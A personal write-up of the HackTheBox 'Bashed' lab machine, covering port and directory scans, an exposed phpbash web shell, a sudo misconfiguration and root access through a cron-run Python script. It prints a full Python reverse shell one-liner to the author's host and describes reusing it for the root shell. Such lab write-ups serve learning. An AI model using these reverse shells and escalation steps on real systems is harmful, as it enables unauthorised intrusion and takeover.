I began the box by first opening the IP address on a web browser to see if anything was there. I noticed it was a blog-style website and there was a single post with the title: phpbash.
I checked out the GitHub page and noticed that there was two files of interest in the main repository: phpbash.php and phpbash.min.php.
While this was all going down, I made sure to run a simple nmap scan to see if there were any other services running.
nmap -sSV -T4 10.10.10.68
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-27 08:15 AEST
Nmap scan report for 10.10.10.68
Host is up (0.11s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
The scan revealed that there was only a single port open (port 80) and I was able to confirm that the most likely point of entry would be through a vulnerability in the website (or some sort of hidden access).
I ran a quick dirb scan to look for the files we discovered in the GitHub repository (phpbash.php, phpbash.min.php).
dirb http://10.10.10.68
START_TIME: Fri Apr 27 08:15:30 2018
URL_BASE: http://10.10.10.68/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
...
==> DIRECTORY: http://10.10.10.68/dev/
I tried navigating to http://10.10.10.68/dev/phpbash.php and discovered a browser-based shell. I then navigated to the user directory to discover the first user flag.
www-data:/var/www/html/dev# cd /home/arrexel && cat user.txt
2c----------------------------c1
The next thing on my to-do list was to escalate from the web-based shell to a terminal. After some quick digging around, I discovered python and utilised a very simple python reverse shell one-liner to connect to the machine from my Kali Linux instance.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.107",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
From the comfort of the terminal, I decided to snoop around to find possible entry points for privilege escalation. The first task I performed was running the command sudo -l to discover any sudo misconfigurations.
www-data@bashed:/home/arrexel# sudo -l
Matching Default entries for www-data on bashed:
...
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
Simply put, this means that the our current user can sudo as scriptmanager without a password. This comes into place when I discovered an out-of-place folder named scripts in the / directory. I used our aforementioned user to list its contents.
www-data@bashed:/home/arrexel$ ls -al /
total 88
...
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Feb 12 23:29 scripts
...
www-data@bashed:/home/arrexel$ ls -al /scripts/
total 16
...
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 17:03 test.py
-rw-r--r-- 1 root root 12 Feb 13 01:45 test.txt
We can see that test.py file is owned by scriptmanager. However; the text file test.txt is owned by root but its content is generated from the python script. Initially, I was confused but after a certain period of time the time of the text file was modified to the current time. This indicated to me with a level of certainty that a scheduled task was running this python script under the root user.
From this point there were multiple ways to get the root flag. One of the methods was to overwrite the script so that it opens up the flag from /root/flag.txt and print its contents ie. as a filename but this would expose/spoil the flag for other people that might still be working on the box. Because of this, I decided that I would just create another reverse shell from the root user to retrieve the flag. The one-liner used previously to migrate from the web-based shell to a terminal shell was used here once again (although expanded and slightly modified so that it will work within the python script).
After waiting for the scheduled task to execute, I was able to successfully successfully received a connection on netcat. The shell indicated that I was root. I navigated to the /root folder and retrieved the root flag.
root@bashed:/scripts# cd /root && cat root.txt
cc----------------------------e2
This was a fairly easy but fun box that covered a variety of techniques and gave me a good introduction to the HackTheBox platform!